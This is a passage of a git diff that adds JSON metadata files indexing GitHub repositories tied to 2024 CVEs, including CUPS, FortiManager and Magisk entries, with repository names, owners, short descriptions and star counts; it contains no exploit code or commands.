"ctf", + "cups", + "cve", + "exploit", + "pentesting", + "rce", + "redteaming" + ], + "visibility": "public", + "forks": 1, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 868024917, + "name": "CVE-2024-47176", + "full_name": "gumerzzzindo\/CVE-2024-47176", + "owner": { + "login": "gumerzzzindo", + "id": 114024126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114024126?v=4", + "html_url": "https:\/\/github.com\/gumerzzzindo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gumerzzzindo\/CVE-2024-47176", + "description": null, + "fork": false, + "created_at": "2024-10-05T09:22:36Z", + "updated_at": "2024-10-05T10:05:20Z", + "pushed_at": "2024-10-05T10:05:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 868786835, + "name": "CVE-2024-47176-Scanner", + "full_name": "MalwareTech\/CVE-2024-47176-Scanner", + "owner": { + "login": "MalwareTech", + "id": 7256561, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7256561?v=4", + "html_url": "https:\/\/github.com\/MalwareTech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MalwareTech\/CVE-2024-47176-Scanner", + "description": "A simple scanner for identifying vulnerable cups-browsed instances on your network", + "fork": false, + "created_at": "2024-10-07T07:25:18Z", + "updated_at": "2025-01-06T15:46:35Z", + "pushed_at": "2024-10-07T16:59:47Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 59, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869045054, + "name": "CVE-2024-47176", + "full_name": "AxthonyV\/CVE-2024-47176", + "owner": { + "login": "AxthonyV", + "id": 141282212, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141282212?v=4", + "html_url": "https:\/\/github.com\/AxthonyV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AxthonyV\/CVE-2024-47176", + "description": "This repository contains a scanner for detecting vulnerabilities in the cups-browsed service of CUPS (Common Unix Printing System). The vulnerability CVE-2024-47176 allows a remote attacker to exploit an insecure configuration of the daemon, potentially leading to arbitrary code execution.", + "fork": false, + "created_at": "2024-10-07T16:14:37Z", + "updated_at": "2024-10-07T16:14:50Z", + "pushed_at": "2024-10-07T16:14:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 874384484, + "name": "CUPS-CVE-2024-47176", + "full_name": "gianlu111\/CUPS-CVE-2024-47176", + "owner": { + "login": "gianlu111", + "id": 43763664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43763664?v=4", + "html_url": "https:\/\/github.com\/gianlu111", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gianlu111\/CUPS-CVE-2024-47176", + "description": "A Mass Scanner designed to detect the CVE-2024-47176 vulnerability across systems running the Common Unix Printing System (CUPS). ", + "fork": false, + "created_at": "2024-10-17T18:21:10Z", + "updated_at": "2024-10-17T18:49:53Z", + "pushed_at": "2024-10-17T18:32:38Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 875147460, + "name": "CVE-2024-47176", + "full_name": "0x7556\/CVE-2024-47176", + "owner": { + "login": "0x7556", + "id": 50582207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50582207?v=4", + "html_url": "https:\/\/github.com\/0x7556", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x7556\/CVE-2024-47176", + "description": "Unix CUPS打印系统 远程代码执行漏洞", + "fork": false, + "created_at": "2024-10-19T08:08:02Z", + "updated_at": "2024-10-19T08:20:57Z", + "pushed_at": "2024-10-19T08:23:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47177.json b/2024/CVE-2024-47177.json new file mode 100644 index 0000000000..091e0b72c9 --- /dev/null +++ b/2024/CVE-2024-47177.json @@ -0,0 +1,33 @@ +[ + { + "id": 863885454, + "name": "cupspot-2024-47177", + "full_name": "referefref\/cupspot-2024-47177", + "owner": { + "login": "referefref", + "id": 56499429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56499429?v=4", + "html_url": "https:\/\/github.com\/referefref", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/referefref\/cupspot-2024-47177", + "description": "PoC honeypot for detecting exploit attempts against CVE-2024-47177", + "fork": false, + "created_at": "2024-09-27T05:18:23Z", + "updated_at": "2024-11-03T07:09:28Z", + "pushed_at": "2024-09-30T04:36:30Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47575.json b/2024/CVE-2024-47575.json new file mode 100644 index 0000000000..b51425bcd0 --- /dev/null +++ b/2024/CVE-2024-47575.json @@ -0,0 +1,157 @@ +[ + { + "id": 885039863, + "name": "Fortijump-Exploit-CVE-2024-47575", + "full_name": "watchtowrlabs\/Fortijump-Exploit-CVE-2024-47575", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/Fortijump-Exploit-CVE-2024-47575", + "description": "Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575", + "fork": false, + "created_at": "2024-11-07T21:03:30Z", + "updated_at": "2025-01-07T13:16:44Z", + "pushed_at": "2024-11-14T16:25:52Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 79, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 888812186, + "name": "exploit-cve-2024-47575", + "full_name": "skyalliance\/exploit-cve-2024-47575", + "owner": { + "login": "skyalliance", + "id": 127739423, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127739423?v=4", + "html_url": "https:\/\/github.com\/skyalliance", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyalliance\/exploit-cve-2024-47575", + "description": "FortiManager Unauthenticated Remote Code Execution (CVE-2024-47575)", + "fork": false, + "created_at": "2024-11-15T03:43:51Z", + "updated_at": "2024-11-18T10:19:14Z", + "pushed_at": "2024-11-15T03:43:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889026655, + "name": "CVE-2024-47575", + "full_name": "expl0itsecurity\/CVE-2024-47575", + "owner": { + "login": "expl0itsecurity", + "id": 185355311, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185355311?v=4", + "html_url": "https:\/\/github.com\/expl0itsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/expl0itsecurity\/CVE-2024-47575", + "description": null, + "fork": false, + "created_at": "2024-11-15T13:19:33Z", + "updated_at": "2024-12-14T20:30:28Z", + "pushed_at": "2024-11-15T18:56:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892397687, + "name": "cve-2024-47575-exp", + "full_name": "XiaomingX\/cve-2024-47575-exp", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-47575-exp", + "description": "CVE-2024-47575是Fortinet的FortiManager和FortiManager Cloud产品中的一个严重漏洞,源于fgfmsd守护进程缺乏对关键功能的身份验证。", + "fork": false, + "created_at": "2024-11-22T03:13:03Z", + "updated_at": "2024-12-11T05:22:35Z", + "pushed_at": "2024-11-22T03:17:57Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 912248045, + "name": "CVE-2024-47575-POC", + "full_name": "Axi0n1ze\/CVE-2024-47575-POC", + "owner": { + "login": "Axi0n1ze", + "id": 170967564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170967564?v=4", + "html_url": "https:\/\/github.com\/Axi0n1ze", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Axi0n1ze\/CVE-2024-47575-POC", + "description": "CVE POC Exploit", + "fork": false, + "created_at": "2025-01-05T02:54:01Z", + "updated_at": "2025-01-05T23:19:02Z", + "pushed_at": "2025-01-05T03:06:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4761.json b/2024/CVE-2024-4761.json new file mode 100644 index 0000000000..c45ec8e52c --- /dev/null +++ b/2024/CVE-2024-4761.json @@ -0,0 +1,33 @@ +[ + { + "id": 800632738, + "name": "CVE-2024-4761", + "full_name": "michredteam\/CVE-2024-4761", + "owner": { + "login": "michredteam", + "id": 168865716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168865716?v=4", + "html_url": "https:\/\/github.com\/michredteam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michredteam\/CVE-2024-4761", + "description": "High CVE-2024-4761 Exploit ", + "fork": false, + "created_at": "2024-05-14T17:45:22Z", + "updated_at": "2024-06-02T12:44:20Z", + "pushed_at": "2024-05-14T18:21:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-47854.json b/2024/CVE-2024-47854.json new file mode 100644 index 0000000000..94d34f9107 --- /dev/null +++ b/2024/CVE-2024-47854.json @@ -0,0 +1,33 @@ +[ + { + "id": 875249581, + "name": "CVE-2024-47854", + "full_name": "MarioTesoro\/CVE-2024-47854", + "owner": { + "login": "MarioTesoro", + "id": 62204045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204045?v=4", + "html_url": "https:\/\/github.com\/MarioTesoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarioTesoro\/CVE-2024-47854", + "description": "Proof of concept of multiple Reflected Cross-Site Scripting (XSS) vulnerabilities discovered in Veritas Data Insight before 7.1.", + "fork": false, + "created_at": "2024-10-19T13:38:23Z", + "updated_at": "2024-10-20T18:11:25Z", + "pushed_at": "2024-10-20T18:11:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48197.json b/2024/CVE-2024-48197.json new file mode 100644 index 0000000000..f9987cdd45 --- /dev/null +++ b/2024/CVE-2024-48197.json @@ -0,0 +1,33 @@ +[ + { + "id": 906634120, + "name": "CVE-2024-48197", + "full_name": "GCatt-AS\/CVE-2024-48197", + "owner": { + "login": "GCatt-AS", + "id": 192431806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/192431806?v=4", + "html_url": "https:\/\/github.com\/GCatt-AS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GCatt-AS\/CVE-2024-48197", + "description": "Reflected XSS in AudioCodes MP-202b", + "fork": false, + "created_at": "2024-12-21T13:07:51Z", + "updated_at": "2024-12-21T13:12:32Z", + "pushed_at": "2024-12-21T13:12:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48208.json b/2024/CVE-2024-48208.json new file mode 100644 index 0000000000..05e809225b --- /dev/null +++ b/2024/CVE-2024-48208.json @@ -0,0 +1,41 @@ +[ + { + "id": 880590271, + "name": "CVE-2024-48208", + "full_name": "rohilchaudhry\/CVE-2024-48208", + "owner": { + "login": "rohilchaudhry", + "id": 146772664, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/146772664?v=4", + "html_url": "https:\/\/github.com\/rohilchaudhry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rohilchaudhry\/CVE-2024-48208", + "description": "This repo contains all the work surrounding the development of the PoC for CVE-2024-48208, and how a simple OOB(Out-of-bound) read can result in jail escapes as well as broken access control.", + "fork": false, + "created_at": "2024-10-30T01:44:32Z", + "updated_at": "2024-11-11T17:49:43Z", + "pushed_at": "2024-11-05T15:09:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2024-48208", + "exploit", + "heap", + "overflow", + "poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48217.json b/2024/CVE-2024-48217.json new file mode 100644 index 0000000000..64eba4bfbe --- /dev/null +++ b/2024/CVE-2024-48217.json @@ -0,0 +1,33 @@ +[ + { + "id": 881716535, + "name": "CVE-2024-48217", + "full_name": "ajrielrm\/CVE-2024-48217", + "owner": { + "login": "ajrielrm", + "id": 45825467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45825467?v=4", + "html_url": "https:\/\/github.com\/ajrielrm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajrielrm\/CVE-2024-48217", + "description": "CVE-2024-48217 Sismart Vulnerability", + "fork": false, + "created_at": "2024-11-01T04:44:17Z", + "updated_at": "2024-11-02T05:24:19Z", + "pushed_at": "2024-11-02T05:24:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48245.json b/2024/CVE-2024-48245.json new file mode 100644 index 0000000000..47ba63e0d7 --- /dev/null +++ b/2024/CVE-2024-48245.json @@ -0,0 +1,33 @@ +[ + { + "id": 907297715, + "name": "CVE-2024-48245", + "full_name": "ShadowByte1\/CVE-2024-48245", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-48245", + "description": "SQL Injection Vulnerability in Vehicle Management System 1.0 - 1.3", + "fork": false, + "created_at": "2024-12-23T09:16:09Z", + "updated_at": "2024-12-23T09:18:38Z", + "pushed_at": "2024-12-23T09:18:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48246.json b/2024/CVE-2024-48246.json new file mode 100644 index 0000000000..2e6fc1d6a3 --- /dev/null +++ b/2024/CVE-2024-48246.json @@ -0,0 +1,33 @@ +[ + { + "id": 907300438, + "name": "CVE-2024-48246", + "full_name": "ShadowByte1\/CVE-2024-48246", + "owner": { + "login": "ShadowByte1", + "id": 155693555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155693555?v=4", + "html_url": "https:\/\/github.com\/ShadowByte1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ShadowByte1\/CVE-2024-48246", + "description": "Vehicle Management System 1.0 - Stored Cross-Site Scripting (XSS)", + "fork": false, + "created_at": "2024-12-23T09:23:15Z", + "updated_at": "2024-12-23T09:25:42Z", + "pushed_at": "2024-12-23T09:25:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48322.json b/2024/CVE-2024-48322.json new file mode 100644 index 0000000000..8af24ec0c0 --- /dev/null +++ b/2024/CVE-2024-48322.json @@ -0,0 +1,33 @@ +[ + { + "id": 885825604, + "name": "CVE-2024-48322", + "full_name": "trqt\/CVE-2024-48322", + "owner": { + "login": "trqt", + "id": 30443527, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30443527?v=4", + "html_url": "https:\/\/github.com\/trqt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/trqt\/CVE-2024-48322", + "description": null, + "fork": false, + "created_at": "2024-11-09T13:52:50Z", + "updated_at": "2024-11-15T13:24:49Z", + "pushed_at": "2024-11-09T14:03:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48325.json b/2024/CVE-2024-48325.json new file mode 100644 index 0000000000..e7fbf93cf8 --- /dev/null +++ b/2024/CVE-2024-48325.json @@ -0,0 +1,33 @@ +[ + { + "id": 882387857, + "name": "cve-2024-48325", + "full_name": "osvaldotenorio\/cve-2024-48325", + "owner": { + "login": "osvaldotenorio", + "id": 45275816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45275816?v=4", + "html_url": "https:\/\/github.com\/osvaldotenorio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osvaldotenorio\/cve-2024-48325", + "description": null, + "fork": false, + "created_at": "2024-11-02T17:43:12Z", + "updated_at": "2024-11-07T00:50:54Z", + "pushed_at": "2024-11-07T00:50:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48326.json b/2024/CVE-2024-48326.json new file mode 100644 index 0000000000..64d70fe830 --- /dev/null +++ b/2024/CVE-2024-48326.json @@ -0,0 +1,33 @@ +[ + { + "id": 882443639, + "name": "CVE-2024-48326", + "full_name": "fabiobsj\/CVE-2024-48326", + "owner": { + "login": "fabiobsj", + "id": 11925049, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11925049?v=4", + "html_url": "https:\/\/github.com\/fabiobsj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fabiobsj\/CVE-2024-48326", + "description": null, + "fork": false, + "created_at": "2024-11-02T19:41:19Z", + "updated_at": "2024-11-02T19:57:14Z", + "pushed_at": "2024-11-02T19:57:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48336.json b/2024/CVE-2024-48336.json new file mode 100644 index 0000000000..4f7bd2db82 --- /dev/null +++ b/2024/CVE-2024-48336.json @@ -0,0 +1,33 @@ +[ + { + "id": 846894468, + "name": "MagiskEoP", + "full_name": "canyie\/MagiskEoP", + "owner": { + "login": "canyie", + "id": 31466456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31466456?v=4", + "html_url": "https:\/\/github.com\/canyie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/canyie\/MagiskEoP", + "description": "Exploit and writeup for installed app to root privilege escalation through CVE-2024-48336 (Magisk Bug #8279), Privileges Escalation \/ Arbitrary Code Execution Vulnerability", + "fork": false, + "created_at": "2024-08-24T08:51:08Z", + "updated_at": "2024-12-25T03:22:50Z", + "pushed_at": "2024-11-05T02:57:25Z", + "stargazers_count": 182, + "watchers_count": 182, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 182, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48359.json b/2024/CVE-2024-48359.json new file mode 100644 index 0000000000..e038d54145 --- /dev/null +++ b/2024/CVE-2024-48359.json @@ -0,0 +1,33 @@ +[ + { + "id": 880891866, + "name": "CVE-2024-48359", + "full_name": "OpenXP-Research\/CVE-2024-48359", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2024-48359", + "description": "CVE-2024-48359 PoC", + "fork": false, + "created_at": "2024-10-30T14:52:04Z", + "updated_at": "2024-12-01T16:09:54Z", + "pushed_at": "2024-10-30T15:02:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48360.json b/2024/CVE-2024-48360.json new file mode 100644 index 0000000000..7f9d89f5ee --- /dev/null +++ b/2024/CVE-2024-48360.json @@ -0,0 +1,33 @@ +[ + { + "id": 880893405, + "name": "CVE-2024-48360", + "full_name": "OpenXP-Research\/CVE-2024-48360", + "owner": { + "login": "OpenXP-Research", + "id": 124332420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124332420?v=4", + "html_url": "https:\/\/github.com\/OpenXP-Research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/OpenXP-Research\/CVE-2024-48360", + "description": "CVE-2024-48360 Poc", + "fork": false, + "created_at": "2024-10-30T14:55:07Z", + "updated_at": "2024-11-05T19:37:17Z", + "pushed_at": "2024-10-30T15:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48392.json b/2024/CVE-2024-48392.json new file mode 100644 index 0000000000..6d071124ca --- /dev/null +++ b/2024/CVE-2024-48392.json @@ -0,0 +1,33 @@ +[ + { + "id": 878366260, + "name": "CVE-2024-48392-PoC", + "full_name": "Renzusclarke\/CVE-2024-48392-PoC", + "owner": { + "login": "Renzusclarke", + "id": 77496879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77496879?v=4", + "html_url": "https:\/\/github.com\/Renzusclarke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Renzusclarke\/CVE-2024-48392-PoC", + "description": null, + "fork": false, + "created_at": "2024-10-25T09:00:11Z", + "updated_at": "2024-10-25T09:23:52Z", + "pushed_at": "2024-10-25T09:23:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48415.json b/2024/CVE-2024-48415.json new file mode 100644 index 0000000000..bac68c66c8 --- /dev/null +++ b/2024/CVE-2024-48415.json @@ -0,0 +1,33 @@ +[ + { + "id": 875127580, + "name": "CVE-2024-48415", + "full_name": "khaliquesX\/CVE-2024-48415", + "owner": { + "login": "khaliquesX", + "id": 185584210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/185584210?v=4", + "html_url": "https:\/\/github.com\/khaliquesX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khaliquesX\/CVE-2024-48415", + "description": null, + "fork": false, + "created_at": "2024-10-19T06:58:56Z", + "updated_at": "2024-10-19T07:08:10Z", + "pushed_at": "2024-10-19T07:08:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48427.json b/2024/CVE-2024-48427.json new file mode 100644 index 0000000000..5042924f39 --- /dev/null +++ b/2024/CVE-2024-48427.json @@ -0,0 +1,33 @@ +[ + { + "id": 877820324, + "name": "CVE-2024-48427", + "full_name": "vighneshnair7\/CVE-2024-48427", + "owner": { + "login": "vighneshnair7", + "id": 186159201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186159201?v=4", + "html_url": "https:\/\/github.com\/vighneshnair7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vighneshnair7\/CVE-2024-48427", + "description": null, + "fork": false, + "created_at": "2024-10-24T09:50:31Z", + "updated_at": "2024-10-29T12:51:15Z", + "pushed_at": "2024-10-24T10:02:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48569.json b/2024/CVE-2024-48569.json new file mode 100644 index 0000000000..9b55676092 --- /dev/null +++ b/2024/CVE-2024-48569.json @@ -0,0 +1,33 @@ +[ + { + "id": 879186454, + "name": "CVE-2024-48569", + "full_name": "MarioTesoro\/CVE-2024-48569", + "owner": { + "login": "MarioTesoro", + "id": 62204045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204045?v=4", + "html_url": "https:\/\/github.com\/MarioTesoro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarioTesoro\/CVE-2024-48569", + "description": "Proof of concept of multiple Stored Cross-Site Scripting (XSS) vulnerabilities discovered in ACI Worldwide Proactive Risk Manager v 9.1.1.0", + "fork": false, + "created_at": "2024-10-27T08:29:59Z", + "updated_at": "2024-11-03T09:33:37Z", + "pushed_at": "2024-11-03T09:33:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-48605.json b/2024/CVE-2024-48605.json new file mode 100644 index 0000000000..c30949b65b --- /dev/null +++ b/2024/CVE-2024-48605.json @@ -0,0 +1,33 @@ +[ + { + "id": 863111238, + "name": "HelakuruV.1.1-DLLHijack", + "full_name": "surajhacx\/HelakuruV.1.1-DLLHijack", + "owner": { + "login": "surajhacx", + "id": 158517938, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/158517938?v=4", + "html_url": "https:\/\/github.com\/surajhacx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/surajhacx\/HelakuruV.1.1-DLLHijack", + "description": "Helakuru Version 1.1 DLL Hijack - CVE-2024-48605", + "fork": false, + "created_at": "2024-09-25T18:23:06Z", + "updated_at": "2024-10-22T16:28:37Z", + "pushed_at": 